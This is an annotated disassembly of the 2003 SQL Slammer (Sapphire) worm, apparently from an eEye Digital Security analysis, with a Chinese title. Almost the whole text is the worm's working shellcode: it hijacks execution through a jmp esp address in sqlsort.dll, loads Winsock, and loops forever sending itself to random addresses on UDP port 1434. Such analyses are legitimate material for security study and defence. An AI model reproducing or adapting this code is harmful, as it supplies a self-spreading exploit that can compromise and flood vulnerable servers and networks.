2003蠕虫王反汇编代码

;SAPPHIRE WORM CODE DISASSEMBLED

;eEye Digital Security: January 25, 2003

push 42B0C9DCh ; [RET] sqlsort.dll - jmp esp

mov eax, 1010101h ; Reconstruct session, after the overflow the payload buffer

; get's corrupted during program execution but before the

; payload is executed. .

xor ecx, ecx

mov cl, 18h

FIXUP:

push eax

loop FIXUP

xor eax, 5010101h

push eax

mov ebp, esp

push ecx

push 6C6C642Eh

push 32336C65h

push 6E72656Bh ; kernel32

push ecx

push 746E756Fh ; GetTickCount

push 436B6369h

push 54746547h

mov cx, 6C6Ch

push ecx

push 642E3233h ; ws2_32.dll

push 5F327377h

mov cx, 7465h

push ecx

push 6B636F73h ; socket

mov cx, 6F74h

push ecx

push 646E6573h ; sendto

mov esi, 42AE1018h ; IAT from sqlsort

lea eax, [ebp-2Ch] ; (ws2_32.dll)

push eax

call dword ptr [esi] ; call loadlibrary

push eax

lea eax, [ebp-20h]

push eax

lea eax, [ebp-10h] ; (kernel32.dll)

push eax

call dword ptr [esi] ; loadlibrary

push eax

mov esi, 42AE1010h ; IAT from sqlsort

mov ebx, [esi]

mov eax, [ebx]

cmp eax, 51EC8B55h ; check entry point fingerprint

jz short VALID_GP ; Check entry point fingerprint for getprocaddress, if it failes

; fall back to GetProcAddress entry in another DLL version.

; Undetermined what dll versions this will succedd on. Due

; to the lack of reliable importing this may not work across all

; dll versions.

mov esi, 42AE101Ch ; IAT entry - 77EA094C

VALID_GP:

call dword ptr [esi] ; GetProcAddress

call eax ; return from GetProcaddress = GetTickCount entrypoint

xor ecx, ecx

push ecx

push ecx

push eax

xor ecx, 9B040103h

xor ecx, 1010101h

push ecx ; 9A050002 = port 1434 / AF_INET

lea eax, [ebp-34h] ; (socket)

push eax

mov eax, [ebp-40h] ; ws2_32 base address

push eax

call dword ptr [esi] ; GetProcAddress

push 11h

push 2

push 2

call eax ; socket

push eax

lea eax, [ebp-3Ch] ; sendto

push eax

mov eax, [ebp-40h] ; ws2_32 base address

push eax

call dword ptr [esi] ; GetProcAddress

mov esi, eax ; save sendto - esi

or ebx, ebx

xor ebx, 0FFD9613Ch

PRND:

mov eax, [ebp-4Ch] ; Pseudo Random Algorithm Start

lea ecx, [eax+eax*2]

lea edx, [eax+ecx*4]

shl edx, 4

add edx, eax

shl edx, 8

sub edx, eax

lea eax, [eax+edx*4]

add eax, ebx ; Pseudo Random Algorithm End

mov [ebp-4Ch], eax

push 10h

lea eax, [ebp-50h]

push eax

xor ecx, ecx

push ecx

xor cx, 178h

push ecx

lea eax, [ebp+3]

push eax

mov eax, [ebp-54h]

push eax

call esi ; sendto

jmp short PRND ; Jump back to Pseudo Random Algorithm Start